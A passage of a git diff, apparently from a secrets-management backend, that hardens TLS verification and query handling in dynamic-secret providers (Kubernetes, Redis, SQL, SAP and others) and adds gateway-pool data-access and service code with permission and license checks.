`${host}:${port}` : host; - await axios.get( + await request.get( `${baseUrl}/api/v1/namespaces/${providerInputs.namespace}/serviceaccounts/${providerInputs.serviceAccountName}`, { headers: { @@ -337,7 +341,7 @@ export const KubernetesProvider = ({ providerInputs.ca && providerInputs.sslEnabled ? new https.Agent({ ca: providerInputs.ca, - rejectUnauthorized: true + rejectUnauthorized: providerInputs.sslRejectUnauthorized }) : undefined; @@ -378,7 +382,7 @@ export const KubernetesProvider = ({ return true; } catch (error) { let errorMessage = error instanceof Error ? error.message : "Unknown error"; - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { if (error.response) { let { message } = error?.response?.data as unknown as { message?: string }; @@ -452,7 +456,7 @@ export const KubernetesProvider = ({ } // 1. Create the service account - await axios.post( + await request.post( `${baseUrl}/api/v1/namespaces/${namespace}/serviceaccounts`, { metadata: { @@ -488,7 +492,7 @@ export const KubernetesProvider = ({ ...(providerInputs.roleType !== KubernetesRoleType.ClusterRole && { namespace }) }; - await axios.post( + await request.post( roleBindingUrl, { metadata: roleBindingMetadata, @@ -523,7 +527,7 @@ export const KubernetesProvider = ({ ); // 3. Request a token for the service account - const res = await axios.post( + const res = await request.post( `${baseUrl}/api/v1/namespaces/${namespace}/serviceaccounts/${serviceAccountName}/token`, { spec: { @@ -564,7 +568,7 @@ export const KubernetesProvider = ({ const baseUrl = port ? `${host}:${port}` : host; - const res = await axios.post( + const res = await request.post( `${baseUrl}/api/v1/namespaces/${providerInputs.namespace}/serviceaccounts/${providerInputs.serviceAccountName}/token`, { spec: { @@ -606,7 +610,7 @@ export const KubernetesProvider = ({ providerInputs.ca && providerInputs.sslEnabled ? 
new https.Agent({ ca: providerInputs.ca, - rejectUnauthorized: true + rejectUnauthorized: providerInputs.sslRejectUnauthorized }) : undefined; @@ -651,7 +655,7 @@ export const KubernetesProvider = ({ }; } catch (error) { let errorMessage = error instanceof Error ? error.message : "Unknown error"; - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { if (error.response) { let { message } = error?.response?.data as unknown as { message?: string }; @@ -695,7 +699,7 @@ export const KubernetesProvider = ({ const namespace = config?.namespace ?? providerInputs.namespace.split(",")[0].trim(); if (providerInputs.roleType === KubernetesRoleType.Role) { - await axios.delete( + await request.delete( `${baseUrl}/apis/rbac.authorization.k8s.io/v1/namespaces/${namespace}/rolebindings/${roleBindingName}`, { headers: { @@ -714,7 +718,7 @@ export const KubernetesProvider = ({ } ); } else { - await axios.delete(`${baseUrl}/apis/rbac.authorization.k8s.io/v1/clusterrolebindings/${roleBindingName}`, { + await request.delete(`${baseUrl}/apis/rbac.authorization.k8s.io/v1/clusterrolebindings/${roleBindingName}`, { headers: { "Content-Type": "application/json", ...(providerInputs.authMethod === KubernetesAuthMethod.Gateway @@ -732,7 +736,7 @@ export const KubernetesProvider = ({ } // Delete the service account - await axios.delete(`${baseUrl}/api/v1/namespaces/${namespace}/serviceaccounts/${entityId}`, { + await request.delete(`${baseUrl}/api/v1/namespaces/${namespace}/serviceaccounts/${entityId}`, { headers: { "Content-Type": "application/json", ...(providerInputs.authMethod === KubernetesAuthMethod.Gateway @@ -765,7 +769,7 @@ export const KubernetesProvider = ({ providerInputs.ca && providerInputs.sslEnabled ? new https.Agent({ ca: providerInputs.ca, - rejectUnauthorized: true + rejectUnauthorized: providerInputs.sslRejectUnauthorized }) : undefined; @@ -798,7 +802,7 @@ export const KubernetesProvider = ({ } } catch (error) { let errorMessage = error instanceof Error ? 
error.message : "Unknown error"; - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { if (error.response) { let { message } = error?.response?.data as unknown as { message?: string }; diff --git a/backend/src/ee/services/dynamic-secret/providers/ldap.ts b/backend/src/ee/services/dynamic-secret/providers/ldap.ts index a71f12ec290..ee7c6f4f510 100644 --- a/backend/src/ee/services/dynamic-secret/providers/ldap.ts +++ b/backend/src/ee/services/dynamic-secret/providers/ldap.ts @@ -56,10 +56,12 @@ export const LdapProvider = (): TDynamicProviderFns => { return new Promise((resolve, reject) => { const client = ldapjs.createClient({ url: providerInputs.url, - tlsOptions: { - ca: providerInputs.ca ? providerInputs.ca : null, - rejectUnauthorized: !!providerInputs.ca - }, + tlsOptions: providerInputs.ca + ? { + ca: providerInputs.ca ? providerInputs.ca : null, + rejectUnauthorized: providerInputs.sslRejectUnauthorized + } + : undefined, reconnect: true, bindDN: providerInputs.binddn, bindCredentials: providerInputs.bindpass diff --git a/backend/src/ee/services/dynamic-secret/providers/models.ts b/backend/src/ee/services/dynamic-secret/providers/models.ts index e2e156e2e67..6b04c0da20b 100644 --- a/backend/src/ee/services/dynamic-secret/providers/models.ts +++ b/backend/src/ee/services/dynamic-secret/providers/models.ts @@ -86,7 +86,8 @@ export const DynamicSecretRedisDBSchema = z.object({ creationStatement: z.string().trim(), revocationStatement: z.string().trim(), renewStatement: z.string().trim().optional(), - ca: z.string().optional() + ca: z.string().optional(), + sslRejectUnauthorized: z.boolean().default(true) }); export const DynamicSecretAwsElastiCacheSchema = z.object({ @@ -96,8 +97,7 @@ export const DynamicSecretAwsElastiCacheSchema = z.object({ region: z.string().trim(), creationStatement: z.string().trim(), - revocationStatement: z.string().trim(), - ca: z.string().optional() + revocationStatement: z.string().trim() }); export const 
DynamicSecretElasticSearchSchema = z.object({ @@ -119,7 +119,8 @@ export const DynamicSecretElasticSearchSchema = z.object({ }) ]), - ca: z.string().optional() + ca: z.string().optional(), + sslRejectUnauthorized: z.boolean().default(true) }); export const DynamicSecretRabbitMqSchema = z.object({ @@ -131,6 +132,7 @@ export const DynamicSecretRabbitMqSchema = z.object({ password: z.string().trim().min(1), ca: z.string().optional(), + sslRejectUnauthorized: z.boolean().default(true), virtualHost: z.object({ name: z.string().trim().min(1), @@ -176,6 +178,7 @@ export const DynamicSecretSqlDBSchema = z.object({ renewStatement: z.string().trim().optional(), ca: z.string().optional(), sslEnabled: z.boolean().optional(), + sslRejectUnauthorized: z.boolean().default(true), gatewayId: z.string().nullable().optional() }); @@ -224,7 +227,8 @@ export const DynamicSecretCassandraSchema = z.object({ creationStatement: z.string().trim(), revocationStatement: z.string().trim(), renewStatement: z.string().trim().optional(), - ca: z.string().optional() + ca: z.string().optional(), + sslRejectUnauthorized: z.boolean().default(true) }); export const DynamicSecretSapAseSchema = z.object({ @@ -329,6 +333,7 @@ export const DynamicSecretMongoDBSchema = z.object({ password: z.string().min(1).trim(), database: z.string().min(1).trim(), ca: z.string().trim().optional().nullable(), + sslRejectUnauthorized: z.boolean().default(true), roles: z .string() .array() @@ -346,7 +351,8 @@ export const DynamicSecretSapHanaSchema = z.object({ creationStatement: z.string().trim(), revocationStatement: z.string().trim(), renewStatement: z.string().trim().optional(), - ca: z.string().optional() + ca: z.string().optional(), + sslRejectUnauthorized: z.boolean().default(true) }); export const DynamicSecretSnowflakeSchema = z.object({ @@ -402,6 +408,7 @@ export const DynamicSecretAzureSqlDBSchema = z.object({ renewStatement: z.string().trim().optional(), ca: z.string().optional(), sslEnabled: 
z.boolean().optional(), + sslRejectUnauthorized: z.boolean().default(true), gatewayId: z.string().nullable().optional() }); @@ -411,6 +418,7 @@ export const LdapSchema = z.union([ binddn: z.string().trim().min(1), bindpass: z.string().trim().min(1), ca: z.string().optional(), + sslRejectUnauthorized: z.boolean().default(true), credentialType: z.literal(LdapCredentialType.Dynamic).optional().default(LdapCredentialType.Dynamic), creationLdif: z.string().min(1), revocationLdif: z.string().min(1), @@ -421,6 +429,7 @@ export const LdapSchema = z.union([ binddn: z.string().trim().min(1), bindpass: z.string().trim().min(1), ca: z.string().optional(), + sslRejectUnauthorized: z.boolean().default(true), credentialType: z.literal(LdapCredentialType.Static), rotationLdif: z.string().min(1) }) @@ -438,6 +447,7 @@ export const DynamicSecretKubernetesSchema = z clusterToken: z.string().trim().optional(), ca: z.string().optional(), sslEnabled: z.boolean().default(false), + sslRejectUnauthorized: z.boolean().default(true), credentialType: z.literal(KubernetesCredentialType.Static), serviceAccountName: z.string().trim().min(1), namespace: z @@ -464,6 +474,7 @@ export const DynamicSecretKubernetesSchema = z clusterToken: z.string().trim().optional(), ca: z.string().optional(), sslEnabled: z.boolean().default(false), + sslRejectUnauthorized: z.boolean().default(true), credentialType: z.literal(KubernetesCredentialType.Dynamic), namespace: z .string() diff --git a/backend/src/ee/services/dynamic-secret/providers/mongo-atlas.ts b/backend/src/ee/services/dynamic-secret/providers/mongo-atlas.ts index b4d296f8e11..163a7302ff8 100644 --- a/backend/src/ee/services/dynamic-secret/providers/mongo-atlas.ts +++ b/backend/src/ee/services/dynamic-secret/providers/mongo-atlas.ts @@ -28,7 +28,8 @@ export const MongoAtlasProvider = (): TDynamicProviderFns => { headers: { Accept: "application/vnd.atlas.2023-02-01+json", "Content-Type": "application/json" - } + }, + maxRedirects: 0 }); const 
digestAuth = createDigestAuthRequestInterceptor( client, diff --git a/backend/src/ee/services/dynamic-secret/providers/mongo-db.ts b/backend/src/ee/services/dynamic-secret/providers/mongo-db.ts index c5442374240..57a2dca5ed1 100644 --- a/backend/src/ee/services/dynamic-secret/providers/mongo-db.ts +++ b/backend/src/ee/services/dynamic-secret/providers/mongo-db.ts @@ -35,7 +35,8 @@ export const MongoDBProvider = (): TDynamicProviderFns => { password: providerInputs.password }, directConnection: !isSrv, - ca: providerInputs.ca || undefined + ca: providerInputs.ca || undefined, + tlsAllowInvalidCertificates: !providerInputs.sslRejectUnauthorized }); return client; }; diff --git a/backend/src/ee/services/dynamic-secret/providers/rabbit-mq.ts b/backend/src/ee/services/dynamic-secret/providers/rabbit-mq.ts index 639453bf31e..d590578191b 100644 --- a/backend/src/ee/services/dynamic-secret/providers/rabbit-mq.ts +++ b/backend/src/ee/services/dynamic-secret/providers/rabbit-mq.ts @@ -92,9 +92,9 @@ export const RabbitMqProvider = (): TDynamicProviderFns => { headers: { "Content-Type": "application/json" }, - + maxRedirects: 0, ...(providerInputs.ca && { - httpsAgent: new https.Agent({ ca: providerInputs.ca, rejectUnauthorized: false }) + httpsAgent: new https.Agent({ ca: providerInputs.ca, rejectUnauthorized: providerInputs.sslRejectUnauthorized }) }) }); diff --git a/backend/src/ee/services/dynamic-secret/providers/redis.ts b/backend/src/ee/services/dynamic-secret/providers/redis.ts index 6f64dd3f089..9860363346f 100644 --- a/backend/src/ee/services/dynamic-secret/providers/redis.ts +++ b/backend/src/ee/services/dynamic-secret/providers/redis.ts @@ -77,8 +77,9 @@ export const RedisDatabaseProvider = (): TDynamicProviderFns => { password: providerInputs.password, ...(providerInputs.ca && { tls: { - rejectUnauthorized: false, - ca: providerInputs.ca + ca: providerInputs.ca, + rejectUnauthorized: providerInputs.sslRejectUnauthorized, + servername: providerInputs.host } }) }); 
@@ -176,7 +177,7 @@ export const RedisDatabaseProvider = (): TDynamicProviderFns => { const username = entityId; - const revokeStatement = handlebars.compile(providerInputs.revocationStatement)({ username }); + const revokeStatement = handlebars.compile(providerInputs.revocationStatement, { noEscape: true })({ username }); const queries = revokeStatement.toString().split(";").filter(Boolean); try { @@ -204,7 +205,10 @@ export const RedisDatabaseProvider = (): TDynamicProviderFns => { const username = entityId; const expiration = new Date(expireAt).toISOString(); - const renewStatement = handlebars.compile(providerInputs.renewStatement)({ username, expiration }); + const renewStatement = handlebars.compile(providerInputs.renewStatement, { noEscape: true })({ + username, + expiration + }); try { if (renewStatement) { diff --git a/backend/src/ee/services/dynamic-secret/providers/sap-ase.ts b/backend/src/ee/services/dynamic-secret/providers/sap-ase.ts index 549507ae385..c5da910b742 100644 --- a/backend/src/ee/services/dynamic-secret/providers/sap-ase.ts +++ b/backend/src/ee/services/dynamic-secret/providers/sap-ase.ts @@ -158,7 +158,7 @@ export const SapAseProvider = (): TDynamicProviderFns => { const masterClient = await $getClient(providerInputs, true); // Get all processes for this login and kill them. If there are active connections to the database when drop login happens, it will throw an error. 
- const result = await masterClient.query<{ spid?: string }>(`sp_who '${username}'`); + const result = await masterClient.query<{ spid?: string }>(`sp_who ?`, [username]); if (result && result.length > 0) { for await (const row of result) { diff --git a/backend/src/ee/services/dynamic-secret/providers/sap-hana.ts b/backend/src/ee/services/dynamic-secret/providers/sap-hana.ts index 2995b5be685..ffb25d53bc3 100644 --- a/backend/src/ee/services/dynamic-secret/providers/sap-hana.ts +++ b/backend/src/ee/services/dynamic-secret/providers/sap-hana.ts @@ -51,7 +51,8 @@ export const SapHanaProvider = (): TDynamicProviderFns => { password: providerInputs.password, ...(providerInputs.ca ? { - ca: providerInputs.ca + ca: providerInputs.ca, + rejectUnauthorized: providerInputs.sslRejectUnauthorized } : {}) }); @@ -148,7 +149,7 @@ export const SapHanaProvider = (): TDynamicProviderFns => { const revoke = async (inputs: unknown, username: string) => { const providerInputs = await validateProviderInputs(inputs); const client = await $getClient(providerInputs); - const revokeStatement = handlebars.compile(providerInputs.revocationStatement)({ username }); + const revokeStatement = handlebars.compile(providerInputs.revocationStatement, { noEscape: true })({ username }); const queries = revokeStatement.toString().split(";").filter(Boolean); try { for await (const query of queries) { @@ -182,7 +183,10 @@ export const SapHanaProvider = (): TDynamicProviderFns => { try { const expiration = new Date(expireAt).toISOString(); - const renewStatement = handlebars.compile(providerInputs.renewStatement)({ username: entityId, expiration }); + const renewStatement = handlebars.compile(providerInputs.renewStatement, { noEscape: true })({ + username: entityId, + expiration + }); const queries = renewStatement.toString().split(";").filter(Boolean); for await (const query of queries) { await new Promise((resolve, reject) => { diff --git a/backend/src/ee/services/dynamic-secret/providers/snowflake.ts 
b/backend/src/ee/services/dynamic-secret/providers/snowflake.ts index 650fe4f8c58..d8ed94921bc 100644 --- a/backend/src/ee/services/dynamic-secret/providers/snowflake.ts +++ b/backend/src/ee/services/dynamic-secret/providers/snowflake.ts @@ -146,7 +146,7 @@ export const SnowflakeProvider = (): TDynamicProviderFns => { const client = await $getClient(providerInputs); try { - const revokeStatement = handlebars.compile(providerInputs.revocationStatement)({ username }); + const revokeStatement = handlebars.compile(providerInputs.revocationStatement, { noEscape: true })({ username }); await new Promise((resolve, reject) => { client.execute({ @@ -181,7 +181,7 @@ export const SnowflakeProvider = (): TDynamicProviderFns => { try { const expiration = getDaysToExpiry(new Date(expireAt)); - const renewStatement = handlebars.compile(providerInputs.renewStatement)({ + const renewStatement = handlebars.compile(providerInputs.renewStatement, { noEscape: true })({ username: entityId, expiration }); diff --git a/backend/src/ee/services/dynamic-secret/providers/sql-database.ts b/backend/src/ee/services/dynamic-secret/providers/sql-database.ts index 7a5505d6584..230dd73b528 100644 --- a/backend/src/ee/services/dynamic-secret/providers/sql-database.ts +++ b/backend/src/ee/services/dynamic-secret/providers/sql-database.ts @@ -147,7 +147,11 @@ export const SqlDatabaseProvider = ({ providerInputs: z.infer & { hostIp: string; originalHost: string } ) => { const ssl = providerInputs.ca - ? { rejectUnauthorized: false, ca: providerInputs.ca, servername: providerInputs.host } + ? { + rejectUnauthorized: providerInputs.sslRejectUnauthorized, + ca: providerInputs.ca, + servername: providerInputs.originalHost + } : undefined; const isMsSQLClient = providerInputs.client === SqlProviders.MsSQL; @@ -185,7 +189,7 @@ export const SqlDatabaseProvider = ({ options: isMsSQLClient ? { ...(providerInputs.sslEnabled !== undefined ? 
{ encrypt: providerInputs.sslEnabled } : {}), - trustServerCertificate: !providerInputs.ca, + trustServerCertificate: !providerInputs.sslRejectUnauthorized, cryptoCredentialsDetails: providerInputs.ca ? { ca: providerInputs.ca } : {} } : undefined @@ -345,7 +349,10 @@ export const SqlDatabaseProvider = ({ originalHost: providerInputs.host }); try { - const revokeStatement = handlebars.compile(providerInputs.revocationStatement)({ username, database }); + const revokeStatement = handlebars.compile(providerInputs.revocationStatement, { noEscape: true })({ + username, + database + }); const queries = revokeStatement.toString().split(";").filter(Boolean); await db.transaction(async (tx) => { for (const query of queries) { @@ -387,7 +394,7 @@ export const SqlDatabaseProvider = ({ const expiration = new Date(expireAt).toISOString(); const { database } = providerInputs; - const renewStatement = handlebars.compile(providerInputs.renewStatement)({ + const renewStatement = handlebars.compile(providerInputs.renewStatement, { noEscape: true })({ username: entityId, expiration, database diff --git a/backend/src/ee/services/email-domain/email-domain-dal.ts b/backend/src/ee/services/email-domain/email-domain-dal.ts index c612f8a3937..f67fbba2740 100644 --- a/backend/src/ee/services/email-domain/email-domain-dal.ts +++ b/backend/src/ee/services/email-domain/email-domain-dal.ts @@ -1,5 +1,6 @@ import { TDbClient } from "@app/db"; import { TableName } from "@app/db/schemas"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify, selectAllTableCols } from "@app/lib/knex"; export type TEmailDomainDALFactory = ReturnType; @@ -27,8 +28,8 @@ export const emailDomainDALFactory = (db: TDbClient) => { if (searchTerm) { void query.where((qb) => { void qb - .where(`${TableName.EmailDomains}.domain`, "ilike", `%${searchTerm}%`) - .orWhere(`${TableName.Organization}.name`, "ilike", `%${searchTerm}%`); + .where(`${TableName.EmailDomains}.domain`, "ilike", 
`%${sanitizeSqlLikeString(searchTerm)}%`) + .orWhere(`${TableName.Organization}.name`, "ilike", `%${sanitizeSqlLikeString(searchTerm)}%`); }); } diff --git a/backend/src/ee/services/gateway-pool/gateway-pool-dal.ts b/backend/src/ee/services/gateway-pool/gateway-pool-dal.ts new file mode 100644 index 00000000000..118b2942936 --- /dev/null +++ b/backend/src/ee/services/gateway-pool/gateway-pool-dal.ts @@ -0,0 +1,94 @@ +import { Knex } from "knex"; + +import { TDbClient } from "@app/db"; +import { TableName } from "@app/db/schemas"; +import { DatabaseError } from "@app/lib/errors"; +import { ormify, selectAllTableCols } from "@app/lib/knex"; + +import { GATEWAY_HEARTBEAT_TIMEOUT_MS } from "../gateway-v2/gateway-v2-constants"; +import { GatewayHealthCheckStatus } from "../gateway-v2/gateway-v2-types"; + +export type TGatewayPoolDALFactory = ReturnType; + +export const gatewayPoolDalFactory = (db: TDbClient) => { + const orm = ormify(db, TableName.GatewayPool); + + const findByOrgIdWithDetails = async (orgId: string) => { + try { + const oneHourAgo = new Date(Date.now() - GATEWAY_HEARTBEAT_TIMEOUT_MS); + + const pools = await db + .replicaNode()(TableName.GatewayPool) + .where(`${TableName.GatewayPool}.orgId`, orgId) + .leftJoin( + TableName.GatewayPoolMembership, + `${TableName.GatewayPool}.id`, + `${TableName.GatewayPoolMembership}.gatewayPoolId` + ) + .leftJoin(TableName.GatewayV2, `${TableName.GatewayPoolMembership}.gatewayId`, `${TableName.GatewayV2}.id`) + .select(selectAllTableCols(TableName.GatewayPool)) + .select( + db.raw(`COUNT(DISTINCT ${TableName.GatewayPoolMembership}."gatewayId") AS "memberCount"`), + db.raw( + `COUNT(DISTINCT CASE WHEN ${TableName.GatewayV2}."heartbeat" > ? AND (${TableName.GatewayV2}."lastHealthCheckStatus" IS NULL OR ${TableName.GatewayV2}."lastHealthCheckStatus" != ?) 
THEN ${TableName.GatewayPoolMembership}."gatewayId" END) AS "healthyMemberCount"`, + [oneHourAgo, GatewayHealthCheckStatus.Failed] + ), + db.raw( + `COALESCE(array_agg(DISTINCT ${TableName.GatewayPoolMembership}."gatewayId") FILTER (WHERE ${TableName.GatewayPoolMembership}."gatewayId" IS NOT NULL), '{}') AS "memberGatewayIds"` + ) + ) + .groupBy(`${TableName.GatewayPool}.id`) + .orderBy(`${TableName.GatewayPool}.name`, "asc"); + + return pools.map((p) => { + const raw = p as Record; + return { + ...p, + memberCount: Number(raw.memberCount ?? 0), + healthyMemberCount: Number(raw.healthyMemberCount ?? 0), + memberGatewayIds: (raw.memberGatewayIds as string[]) ?? [] + }; + }); + } catch (error) { + throw new DatabaseError({ error, name: `${TableName.GatewayPool}: FindByOrgId` }); + } + }; + + const findByIdWithMembers = async (poolId: string, orgId: string) => { + try { + const pool = await db + .replicaNode()(TableName.GatewayPool) + .where(`${TableName.GatewayPool}.id`, poolId) + .where(`${TableName.GatewayPool}.orgId`, orgId) + .first(); + + if (!pool) return null; + + const members = await db + .replicaNode()(TableName.GatewayPoolMembership) + .where(`${TableName.GatewayPoolMembership}.gatewayPoolId`, poolId) + .join(TableName.GatewayV2, `${TableName.GatewayPoolMembership}.gatewayId`, `${TableName.GatewayV2}.id`) + .select( + `${TableName.GatewayV2}.id`, + `${TableName.GatewayV2}.name`, + `${TableName.GatewayV2}.heartbeat`, + `${TableName.GatewayV2}.lastHealthCheckStatus` + ); + + return { ...pool, gateways: members }; + } catch (error) { + throw new DatabaseError({ error, name: `${TableName.GatewayPool}: FindByIdWithMembers` }); + } + }; + + const countByOrgId = async (orgId: string, tx?: Knex) => { + try { + const result = await (tx || db.replicaNode())(TableName.GatewayPool).where({ orgId }).count("id").first(); + return parseInt(String(result?.count || "0"), 10); + } catch (error) { + throw new DatabaseError({ error, name: `${TableName.GatewayPool}: 
CountByOrgId` }); + } + }; + + return { ...orm, findByOrgIdWithDetails, findByIdWithMembers, countByOrgId }; +}; diff --git a/backend/src/ee/services/gateway-pool/gateway-pool-membership-dal.ts b/backend/src/ee/services/gateway-pool/gateway-pool-membership-dal.ts new file mode 100644 index 00000000000..d3a4b7b8f8e --- /dev/null +++ b/backend/src/ee/services/gateway-pool/gateway-pool-membership-dal.ts @@ -0,0 +1,37 @@ +import { TDbClient } from "@app/db"; +import { TableName, TGatewaysV2 } from "@app/db/schemas"; +import { DatabaseError } from "@app/lib/errors"; +import { ormify } from "@app/lib/knex"; + +import { GATEWAY_HEARTBEAT_TIMEOUT_MS } from "../gateway-v2/gateway-v2-constants"; +import { GatewayHealthCheckStatus } from "../gateway-v2/gateway-v2-types"; + +export type TGatewayPoolMembershipDALFactory = ReturnType; + +export const gatewayPoolMembershipDalFactory = (db: TDbClient) => { + const orm = ormify(db, TableName.GatewayPoolMembership); + + const findHealthyGatewaysByPoolId = async (poolId: string): Promise => { + try { + const oneHourAgo = new Date(Date.now() - GATEWAY_HEARTBEAT_TIMEOUT_MS); + + const gateways = await db + .replicaNode()(TableName.GatewayPoolMembership) + .where(`${TableName.GatewayPoolMembership}.gatewayPoolId`, poolId) + .join(TableName.GatewayV2, `${TableName.GatewayPoolMembership}.gatewayId`, `${TableName.GatewayV2}.id`) + .where(`${TableName.GatewayV2}.heartbeat`, ">", oneHourAgo) + .where((builder) => { + void builder + .whereNull(`${TableName.GatewayV2}.lastHealthCheckStatus`) + .orWhereNot(`${TableName.GatewayV2}.lastHealthCheckStatus`, GatewayHealthCheckStatus.Failed); + }) + .select(`${TableName.GatewayV2}.*`); + + return gateways as TGatewaysV2[]; + } catch (error) { + throw new DatabaseError({ error, name: `${TableName.GatewayPoolMembership}: FindHealthyGateways` }); + } + }; + + return { ...orm, findHealthyGatewaysByPoolId }; +}; diff --git a/backend/src/ee/services/gateway-pool/gateway-pool-service.ts 
b/backend/src/ee/services/gateway-pool/gateway-pool-service.ts new file mode 100644 index 00000000000..60b057e1da4 --- /dev/null +++ b/backend/src/ee/services/gateway-pool/gateway-pool-service.ts @@ -0,0 +1,303 @@ +import { ForbiddenError } from "@casl/ability"; + +import { OrganizationActionScope } from "@app/db/schemas"; +import { DatabaseErrorCode } from "@app/lib/error-codes"; +import { BadRequestError, DatabaseError, NotFoundError } from "@app/lib/errors"; +import { logger } from "@app/lib/logger"; +import { OrgServiceActor } from "@app/lib/types"; +import { TIdentityKubernetesAuthDALFactory } from "@app/services/identity-kubernetes-auth/identity-kubernetes-auth-dal"; + +import { TGatewayV2DALFactory } from "../gateway-v2/gateway-v2-dal"; +import { TGatewayV2ServiceFactory } from "../gateway-v2/gateway-v2-service"; +import { TGatewayV2ConnectionDetails } from "../gateway-v2/gateway-v2-types"; +import { TLicenseServiceFactory } from "../license/license-service"; +import { OrgPermissionGatewayPoolActions, OrgPermissionSubjects } from "../permission/org-permission"; +import { TPermissionServiceFactory } from "../permission/permission-service-types"; +import { TGatewayPoolDALFactory } from "./gateway-pool-dal"; +import { TGatewayPoolMembershipDALFactory } from "./gateway-pool-membership-dal"; +import { + TAddGatewayToPoolDTO, + TCreateGatewayPoolDTO, + TDeleteGatewayPoolDTO, + TGetGatewayPoolByIdDTO, + TGetPlatformConnectionDetailsByPoolIdDTO, + TListGatewayPoolsDTO, + TRemoveGatewayFromPoolDTO, + TUpdateGatewayPoolDTO +} from "./gateway-pool-types"; + +type TGatewayPoolServiceFactoryDep = { + gatewayPoolDAL: TGatewayPoolDALFactory; + gatewayPoolMembershipDAL: TGatewayPoolMembershipDALFactory; + gatewayV2DAL: Pick; + gatewayV2Service: Pick; + permissionService: TPermissionServiceFactory; + licenseService: Pick; + identityKubernetesAuthDAL: Pick; +}; + +export type TGatewayPoolServiceFactory = ReturnType; + +export const gatewayPoolServiceFactory = ({ + 
gatewayPoolDAL, + gatewayPoolMembershipDAL, + gatewayV2DAL, + gatewayV2Service, + permissionService, + licenseService, + identityKubernetesAuthDAL +}: TGatewayPoolServiceFactoryDep) => { + const $checkPermission = async (actor: OrgServiceActor, action: OrgPermissionGatewayPoolActions) => { + const { permission } = await permissionService.getOrgPermission({ + actor: actor.type, + actorId: actor.id, + orgId: actor.orgId, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId, + scope: OrganizationActionScope.Any + }); + ForbiddenError.from(permission).throwUnlessCan(action, OrgPermissionSubjects.GatewayPool); + }; + + const $checkLicense = async (orgId: string) => { + const plan = await licenseService.getPlan(orgId); + if (!plan.gatewayPool) { + throw new BadRequestError({ + message: "Your current plan does not support gateway pools. Please upgrade to an Enterprise plan." + }); + } + }; + + const createGatewayPool = async ({ name, ...actor }: TCreateGatewayPoolDTO) => { + await $checkPermission(actor, OrgPermissionGatewayPoolActions.CreateGatewayPools); + await $checkLicense(actor.orgId); + + try { + const pool = await gatewayPoolDAL.create({ + orgId: actor.orgId, + name + }); + return pool; + } catch (error) { + if ( + error instanceof DatabaseError && + (error as DatabaseError & { code?: string }).code === DatabaseErrorCode.UniqueViolation + ) { + throw new BadRequestError({ + message: `A gateway pool named "${name}" already exists in this organization.` + }); + } + throw error; + } + }; + + const listGatewayPools = async (actor: TListGatewayPoolsDTO) => { + await $checkPermission(actor, OrgPermissionGatewayPoolActions.ListGatewayPools); + await $checkLicense(actor.orgId); + + const pools = await gatewayPoolDAL.findByOrgIdWithDetails(actor.orgId); + + if (pools.length === 0) return []; + + // Add more DAL counts here as pool support expands to other consumers + const [k8sAuthCounts] = await Promise.all([ + Promise.all( + pools.map((pool) => + 
identityKubernetesAuthDAL.countByGatewayPoolId(pool.id).then((count) => ({ id: pool.id, count })) + ) + ) + ]); + + const countMap = new Map(); + for (const { id, count } of k8sAuthCounts) { + countMap.set(id, (countMap.get(id) ?? 0) + count); + } + + return pools.map((pool) => ({ + ...pool, + connectedResourcesCount: countMap.get(pool.id) ?? 0 + })); + }; + + const getGatewayPoolById = async ({ poolId, ...actor }: TGetGatewayPoolByIdDTO) => { + await $checkPermission(actor, OrgPermissionGatewayPoolActions.ListGatewayPools); + await $checkLicense(actor.orgId); + + const pool = await gatewayPoolDAL.findByIdWithMembers(poolId, actor.orgId); + if (!pool) { + throw new NotFoundError({ message: `Gateway pool with ID ${poolId} not found` }); + } + + return pool; + }; + + const updateGatewayPool = async ({ poolId, name, ...actor }: TUpdateGatewayPoolDTO) => { + await $checkPermission(actor, OrgPermissionGatewayPoolActions.EditGatewayPools); + await $checkLicense(actor.orgId); + + const existingPool = await gatewayPoolDAL.findById(poolId); + if (!existingPool || existingPool.orgId !== actor.orgId) { + throw new NotFoundError({ message: `Gateway pool with ID ${poolId} not found` }); + } + + try { + const updated = await gatewayPoolDAL.updateById(poolId, { + ...(name !== undefined && { name }) + }); + return updated; + } catch (error) { + if ( + error instanceof DatabaseError && + (error as DatabaseError & { code?: string }).code === DatabaseErrorCode.UniqueViolation + ) { + throw new BadRequestError({ message: `A gateway pool named "${name}" already exists in this organization.` }); + } + throw error; + } + }; + + const deleteGatewayPool = async ({ poolId, ...actor }: TDeleteGatewayPoolDTO) => { + await $checkPermission(actor, OrgPermissionGatewayPoolActions.DeleteGatewayPools); + await $checkLicense(actor.orgId); + + const existingPool = await gatewayPoolDAL.findById(poolId); + if (!existingPool || existingPool.orgId !== actor.orgId) { + throw new NotFoundError({ message: 
`Gateway pool with ID ${poolId} not found` }); + } + + try { + await gatewayPoolDAL.deleteById(poolId); + } catch (error) { + if ( + error instanceof DatabaseError && + (error.error as { code?: string })?.code === DatabaseErrorCode.ForeignKeyViolation + ) { + throw new BadRequestError({ + message: `Cannot delete pool "${existingPool.name}" because it is referenced by one or more consumer configurations. Remove the pool reference from those configs first.` + }); + } + throw error; + } + + return existingPool; + }; + + const addGatewayToPool = async ({ poolId, gatewayId, ...actor }: TAddGatewayToPoolDTO) => { + await $checkPermission(actor, OrgPermissionGatewayPoolActions.EditGatewayPools); + await $checkLicense(actor.orgId); + + const pool = await gatewayPoolDAL.findById(poolId); + if (!pool || pool.orgId !== actor.orgId) { + throw new NotFoundError({ message: `Gateway pool with ID ${poolId} not found` }); + } + + const gateway = await gatewayV2DAL.findById(gatewayId); + if (!gateway || gateway.orgId !== actor.orgId) { + throw new NotFoundError({ message: `Gateway with ID ${gatewayId} not found` }); + } + + try { + const membership = await gatewayPoolMembershipDAL.create({ gatewayPoolId: poolId, gatewayId }); + return { membership, poolName: pool.name, gatewayName: gateway.name }; + } catch (error) { + if ( + error instanceof DatabaseError && + (error as DatabaseError & { code?: string }).code === DatabaseErrorCode.UniqueViolation + ) { + throw new BadRequestError({ message: "This gateway is already a member of the pool." 
